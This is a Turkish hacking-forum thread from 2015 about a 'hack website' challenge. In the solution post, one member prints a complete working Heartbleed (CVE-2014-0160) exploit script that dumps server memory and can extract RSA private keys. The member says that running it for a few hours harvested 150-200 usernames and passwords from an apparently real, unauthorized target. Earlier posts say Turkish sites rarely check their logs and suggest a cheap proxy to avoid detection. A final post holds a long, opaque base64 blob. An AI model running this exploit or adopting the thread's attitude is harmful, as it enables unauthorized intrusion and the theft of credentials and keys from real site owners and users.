Tahribat.com Forumları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Meydan Okuma - Hack Website Vol. 4

Yazar Allura (7) by_Tet (3) furkiak (1) HolyOne (1) KaptaN (1) Lightsaber (1) NoktaliVirgul (3) ozgunlu (1) pcdoktor636 (1) pesimistzombie (1) RockZs (1) sancaks (1) SeRDaR (2) unbalanced (1) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Meydan Okuma - Hack Website Vol. 4

1. 04/Tem/15 13:09 Kısayol Şikayet Özel Mesaj
   NoktaliVirgul
   
   

   Kayıt Tarihi: 02/Temmuz/2007
   

   Allura bunu yazdı

   brute crawler kullanmak yasak kullanmayın dirbuster fln hiç kullanmayın lütfen

   yassak :(

   Son kısma henüz başlamadım zaten. Türk siteleri verip kıllandırıyorsun :D

   Siteler senin sorumluluğunda mı demiştim?

   ---

   If my calculations are correct, when this baby hits eighty-eight miles per hour... you"re gonna see some serious shit.
   Alıntı yap
2. 04/Tem/15 13:13 Kısayol Şikayet Özel Mesaj
   Allura
   
   

   Kayıt Tarihi: 17/Mayıs/2009
   

   yok siteler ile alakam yok türk siteleri loglara 10 yılda bir baktıgından anlamazlar birşey ama çok şüpheciyseniz proxy fln alın 0.99 cent'e kafanız rahat etsin yine de siteye hacked by okan yazmadıkça bakmaz kimse loga fln kaldıki şu sitede enson 2 yıl önce sistemsel güncelleme olmuş anlayan kişiler egil yani merak etmeyin 

   ---

   "
   Alıntı yap
3. 04/Tem/15 13:52 Kısayol Şikayet Özel Mesaj
   NoktaliVirgul
   
   

   Kayıt Tarihi: 02/Temmuz/2007
   

   Allura bunu yazdı

   yok siteler ile alakam yok türk siteleri loglara 10 yılda bir baktıgından anlamazlar birşey ama çok şüpheciyseniz proxy fln alın 0.99 cent'e kafanız rahat etsin yine de siteye hacked by okan yazmadıkça bakmaz kimse loga fln kaldıki şu sitede enson 2 yıl önce sistemsel güncelleme olmuş anlayan kişiler egil yani merak etmeyin 

   zaten iş yerinde olduğum için digitalocean makinemden yaptım sql işlerini :)

   Aslında bir tane vps alınıp böyle ctf kurgulanabilir. DO'da aylık 5$ zaten. Ufak ödüller falan..

   NoktaliVirgul tarafından 04/Tem/15 13:56 tarihinde düzenlenmiştir

   ---

   If my calculations are correct, when this baby hits eighty-eight miles per hour... you"re gonna see some serious shit.
   Alıntı yap
4. 06/Tem/15 12:30 Kısayol Şikayet Özel Mesaj
   Allura
   
   

   Kayıt Tarihi: 17/Mayıs/2009
   

   ------ SPOILER ÇÖZÜMÜ ------

   ------ SPOILER ÇÖZÜMÜ ------

    

   gelelim çözümüne kimse çözemedi zor degildi en kolaylarından denilebilir hatta

   öncelikle kriptodan başlayalım limonu masaüstüne kayıt ediyoruz ve not defteri ile içini açıyoruz

   en üstünde base64 ile sifrelenmis veri cozun devam edin " aHR0cDovL3ppbGFpci5jb20vZ2lyaXMucGhw "  şu şekilde bir yazı var 

   base 64 ile decode ediyoruz 

   http://zilair.com/giris.php bize bu siteyi veriyor ufak bir login şayfası bunu kırmamız gerekiyor

   kaynak koduna bakıyoruz

   
   ede0f07fd7ec755abb051f13c4bd5d36 kırdıgımızda ise tbt14 diye bir şifre çıkıyor karşımıza hemen login olalım

   ve şu şekilde bir açıklama geliyor şimdi

    

   sifre dogru 
   hedef sitemiz: http://xxx
   
   sitede herhangi birisinin kullanici adi ve sifresini almaya calisiyoruz, bazi kurallar var bruteforce yasak, ve eger siteden herhangi birisinin kullanici adi veya sifresini alirsaniz bunu yontem ile beraber ozel mesaj atiniz, eger yonteminiz sans ise sayilmayaz...
   10 günden yeni üyelikler sayılmayacak, shell sql injection rfi lfi fishing herşey serbest 
   unutma sabretmek onemlidir sonuca ulasirken biraz beklemek gerekebilir 
   elbet gelir bekledikleriniz
   
   have fun :D
   
   

   
   
   

   şimdi gelelim çözüme

   açıgımız sql rfi lfi veya başka birşey degil heartbleed açıgı yani ssl üzerinde kaynaklanan açık sayesinde mitm yaparak bilgileri alacagız

   kodumuz

    

   #!/usr/bin/python
   
   # Modified by Travis Lee
   # Last Updated: 4/21/14
   # Version 1.16
   #
   # -changed output to display text only instead of hexdump and made it easier to read
   # -added option to specify number of times to connect to server (to get more data)
   # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... 
   # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
   # -added option to have verbose output
   # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command 
   # -added option for hex output
   # -added option to output raw data to a file
   # -added option to output ascii data to a file
   # -added option to not display returned data on screen (good if doing many iterations and outputting to a file)
   # -added tls version auto-detection
   # -added an extract rsa private key mode (orig code from epixoip. will exit script when found and enables -d (do not display returned data on screen)
   #  -requires following modules: gmpy, pyasn1
   
   # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
   # The author disclaims copyright to this source code.
   
   import sys
   import struct
   import socket
   import time
   import select
   import re
   import time
   import os
   from optparse import OptionParser
   
   options = OptionParser(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)')
   options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
   options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
   options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
   options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
   options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')
   options.add_option('-x', '--hexdump', action="store_true", dest="hexdump", help='Enable hex output')
   options.add_option('-r', '--rawoutfile', type='str', help='Dump the raw memory contents to a file')
   options.add_option('-a', '--asciioutfile', type='str', help='Dump the ascii contents to a file')
   options.add_option('-d', '--donotdisplay', action="store_true", dest="donotdisplay", help='Do not display returned data on screen')
   options.add_option('-e', '--extractkey', action="store_true", dest="extractkey", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')
   
   opts, args = options.parse_args()
   
   if opts.extractkey:
       import base64, gmpy
       from pyasn1.codec.der import encoder
       from pyasn1.type.univ import *
   
   def hex2bin(arr):
       return ''.join('{:02x}'.format(x) for x in arr).decode('hex')
   
   tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}
   
   def build_client_hello(tls_ver):
       client_hello = [
   # TLS header ( 5 bytes)
   0x16,               # Content type (0x16 for handshake)
   0x03, tls_ver,         # TLS Version
   0x00, 0xdc,         # Length
   # Handshake header
   0x01,               # Type (0x01 for ClientHello)
   0x00, 0x00, 0xd8,   # Length
   0x03, tls_ver,         # TLS Version
   # Random (32 byte)
   0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
   0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
   0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
   0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
   0x00,               # Session ID length
   0x00, 0x66,         # Cipher suites length
   # Cipher suites (51 suites)
   0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
   0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
   0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
   0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
   0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
   0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
   0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
   0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
   0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
   0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
   0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
   0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
   0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
   0x01,               # Compression methods length
   0x00,               # Compression method (0x00 for NULL)
   0x00, 0x49,         # Extensions length
   # Extension: ec_point_formats
   0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
   # Extension: elliptic_curves
   0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
   0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
   0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
   0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
   0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
   0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
   0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
   # Extension: SessionTicket TLS
   0x00, 0x23, 0x00, 0x00,
   # Extension: Heartbeat
   0x00, 0x0f, 0x00, 0x01, 0x01
       ]
       return client_hello
       
   def build_heartbeat(tls_ver):
       heartbeat = [
   0x18,       # Content Type (Heartbeat)
   0x03, tls_ver,  # TLS version
   0x00, 0x03,  # Length
   # Payload
   0x01,       # Type (Request)
   0x40, 0x00  # Payload length
       ] 
       return heartbeat
   
   
   if opts.rawoutfile:
       rawfileOUT = open(opts.rawoutfile, "a")
   
   if opts.asciioutfile:
       asciifileOUT = open(opts.asciioutfile, "a")
       
   if opts.extractkey:
       opts.donotdisplay = True
       
   def hexdump(s):
       pdat = ''
       hexd = ''
       for b in xrange(0, len(s), 16):
           lin = [c for c in s[b : b + 16]]
           if opts.hexdump:
               hxdat = ' '.join('%02X' % ord(c) for c in lin)
               pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
               hexd += '  %04x: %-48s %s\n' % (b, hxdat, pdat)
           else:
               pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
       if opts.hexdump:
   	    return hexd
       else:
           pdat = re.sub(r'([.]{50,})', '', pdat)
           if opts.asciioutfile:
               asciifileOUT.write(pdat)
           return pdat
   
   def rcv_tls_record(s):
       try:
           tls_header = s.recv(5)
           if not tls_header:
               print 'Unexpected EOF (header)' 
               return None,None,None        
           typ,ver,length = struct.unpack('>BHH',tls_header)
           message = ''
           while len(message) != length:
               message += s.recv(length-len(message))
           if not message:
               print 'Unexpected EOF (message)'
               return None,None,None
           if opts.verbose:
   	        print 'Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,)
           return typ,ver,message
       except Exception as e:
           print "\nError Receiving Record! " + str(e)
           return None,None,None
   
   def hit_hb(s, targ, firstrun, supported):
       s.send(hex2bin(build_heartbeat(supported)))
       while True:
           typ, ver, pay = rcv_tls_record(s)
           if typ is None:
               print 'No heartbeat response received, server likely not vulnerable'
               return ''
   
           if typ == 24:
               if opts.verbose:
                   print 'Received heartbeat response...'
               if len(pay) > 3:
                   if firstrun or opts.verbose:
                       print '\nWARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
                   if opts.rawoutfile:
                       rawfileOUT.write(pay)
                   if opts.extractkey:
                   	return pay
                   else:
   	                return hexdump(pay)
               else:
                   print 'Server processed malformed heartbeat, but did not return any extra data.'
   
           if typ == 21:
               print 'Received alert:'
               return hexdump(pay)
               print 'Server returned error, likely not vulnerable'
               return ''
   
   
   def conn(targ, port):
       try:
           s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
           sys.stdout.flush()
           s.settimeout(10)
           #time.sleep(0.2)
           s.connect((targ, port))
           return s
   
       except Exception as e:
          print "Connection Error! " + str(e)
          return None
          
   def bleed(targ, port):
       try:
           res = ''
           firstrun = True
           print '\n##################################################################'
           print 'Connecting to: ' + targ + ':' + str(port) + ', ' + str(opts.num) + ' times'
           for x in range(0, opts.num):
               if x > 0:
                   firstrun = False
               
               if x == 0 and opts.extractkey:
                   print "Attempting to extract private key from returned data..."
                   if not os.path.exists('./hb-certs'):
                       os.makedirs('./hb-certs')
                   print '\nGrabbing public cert from: ' + targ + ':' + str(port) + '\n'
                   os.system('echo | openssl s_client -connect ' + targ + ':' + str(port) + ' -showcerts | openssl x509 > hb-certs/sslcert_' + targ + '.pem')	
                   print '\nExtracting modulus from cert...\n'
                   os.system('openssl x509 -pubkey -noout -in hb-certs/sslcert_' + targ + '.pem > hb-certs/sslcert_' + targ + '_pubkey.pem')
                   output = os.popen('openssl x509 -in hb-certs/sslcert_' + targ + '.pem -modulus -noout | cut -d= -f2')
                   modulus = output.read()
               
               s = conn(targ, port)
               if not s:
                   continue
   
               # send starttls command if specified as an option or if common smtp/pop3/imap ports are used
               if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
                   
                   stls = False
                   atls = False
                   
                   # check if smtp supports starttls/stls
                   if port in {25, 587}:
                       print 'SMTP Port... Checking for STARTTLS Capability...'
                       check = s.recv(1024)
                       s.send("EHLO someone.org\n")
                       sys.stdout.flush()
                       check += s.recv(1024)
                       if opts.verbose:
                           print check
                                           
                       if "STARTTLS" in check:
                           opts.starttls = True
                           print "STARTTLS command found"
                       elif "STLS" in check:
                           opts.starttls = True
                           stls = True
                           print "STLS command found"
                       else:
                           print "STARTTLS command NOT found!"
                           print '##################################################################'
                           return
                   
                   # check if pop3/imap supports starttls/stls                            
                   elif port in {110, 143}:
                       print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
                       check = s.recv(1024)
                       if port == 110:
                           s.send("CAPA\n")
                       if port == 143:
                           s.send("CAPABILITY\n")
                       sys.stdout.flush()
                       check += s.recv(1024)
                       if opts.verbose:
                           print check
                                              
                       if "STARTTLS" in check:
                           opts.starttls = True
                           print "STARTTLS command found"
                       elif "STLS" in check:
                           opts.starttls = True
                           stls = True
                           print "STLS command found"
                       else:
                           print "STARTTLS command NOT found!"
                           print '##################################################################'
                           return
                           
                   # check if ftp supports auth tls/starttls                          
                   elif port in {21}:
                       print 'FTP Port... Checking for AUTH TLS Capability...'
                       check = s.recv(1024)
                       s.send("FEAT\n")
                       sys.stdout.flush()
                       check += s.recv(1024)
                       if opts.verbose:
                           print check
                           
                       if "STARTTLS" in check:
                           opts.starttls = True
                           print "STARTTLS command found"
                       elif "AUTH TLS" in check:
                           opts.starttls = True
                           atls = True
                           print "AUTH TLS command found"
                       else:
                           print "STARTTLS command NOT found!"
                           print '##################################################################'
                           return
                                           
                   # send appropriate tls command if supported                        
                   if opts.starttls:       
                       sys.stdout.flush()
                       if stls:
                           print 'Sending STLS Command...'
                           s.send("STLS\n")
                       elif atls:
                           print 'Sending AUTH TLS Command...'
                           s.send("AUTH TLS\n")
                       else:
                           print 'Sending STARTTLS Command...'
                           s.send("STARTTLS\n")
                       if opts.verbose:
                           print 'Waiting for reply...'
                       sys.stdout.flush()
                       rcv_tls_record(s)
   
               supported = False
               for num,tlsver in tls_versions.items():
                   
                   if firstrun:
                       print 'Sending Client Hello for {}'.format(tlsver)
                   s.send(hex2bin(build_client_hello(num)))
                   
                   if opts.verbose:
                       print 'Waiting for Server Hello...'
                   
                   while True:
                       typ,ver,message = rcv_tls_record(s)
                       if not typ:
                           if opts.verbose:
                               print 'Server closed connection without sending ServerHello for {}'.format(tlsver)
                           s.close()
                           s = conn(targ, port)
                           break
                       if typ == 22 and ord(message[0]) == 0x0E:
                           if firstrun:
                               print 'Received Server Hello for {}'.format(tlsver)
                           supported = True
                           break
                   if supported: break
   
               if not supported:
                   print '\nError! No TLS versions supported!'
                   print '##################################################################'
                   return
   
               if opts.verbose:
                   print '\nSending heartbeat request...'
               sys.stdout.flush()
               
               keyfound = False
               if opts.extractkey:
               	res = hit_hb(s, targ, firstrun, supported)
               	if res == '':
               	    continue
               	keyfound = extractkey(targ, res, modulus)
               else:
   	            res += hit_hb(s, targ, firstrun, supported)
               s.close()
               if keyfound:
                   sys.exit(0)
               else:
                   sys.stdout.write('\rPlease wait... connection attempt ' + str(x+1) + ' of ' + str(opts.num))
                   sys.stdout.flush()
           
           print '\n##################################################################'
           print       
           return res
       
       except Exception as e:
          print "Error! " + str(e)
          print '##################################################################'
          print               
   
   def extractkey(host, chunk, modulus):
   	
       #print "\nChecking for private key...\n"
       n = int (modulus, 16)
       keysize = n.bit_length() / 16
   
       for offset in xrange (0, len (chunk) - keysize):
           p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
           if gmpy.is_prime (p) and p != n and n % p == 0:
               if opts.verbose:
                   print '\n\nFound prime: ' + str(p)
               e = 65537
               q = n / p
               phi = (p - 1) * (q - 1)
               d = gmpy.invert (e, phi)
               dp = d % (p - 1)
               dq = d % (q - 1)
               qinv = gmpy.invert (q, p)
               seq = Sequence()
               for x in [0, n, e, d, p, q, dp, dq, qinv]:
                   seq.setComponentByPosition (len (seq), Integer (x))
               print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
               privkeydump = open("hb-certs/privkey_" + host + ".dmp", "a")
               privkeydump.write(chunk)
               return True
           else:
               return False
   
   def main():
   
       print "\ndefribulator v1.16"
       print "A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)"
       allresults = ''
                       
       # if a file is specified, loop through file
       if opts.filein:
           fileIN = open(opts.filein, "r")
           
           for line in fileIN:
               targetinfo = line.strip().split(":")
               if len(targetinfo) > 1:
                   allresults = bleed(targetinfo[0], int(targetinfo[1]))
               else:
                   allresults = bleed(targetinfo[0], opts.port)
               
               if allresults and (not opts.donotdisplay):
                   print '%s' % (allresults)
   
           fileIN.close()
   
       else:
           if len(args) < 1:
               options.print_help()
               return
           allresults = bleed(args[0], opts.port)
           if allresults and (not opts.donotdisplay):
               print '%s' % (allresults)
       
       print
       
       if opts.rawoutfile:
           rawfileOUT.close()
       
       if opts.asciioutfile:
           asciifileOUT.close()
               
   if __name__ == '__main__':
       main()
    

    

   exploit ile 1-2 saat dinlenirse ağ 150-200 tane user:pass düşüyor bu da bu kadardı.

    

   ------ SPOILER ÇÖZÜMÜ ------

   ------ SPOILER ÇÖZÜMÜ ------

    

   Allura tarafından 06/Tem/15 12:31 tarihinde düzenlenmiştir

   ---

   "
   Alıntı yap
5. 06/Tem/15 22:48 Kısayol Şikayet Özel Mesaj
   Herbokolog
   KaptaN
   
   
   

   Kayıt Tarihi: 30/Ağustos/2005
   

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="dk" lang="dk"<head><meta http-equiv="Cache-Control" content="max-age=0"/></head><body>encode=base64;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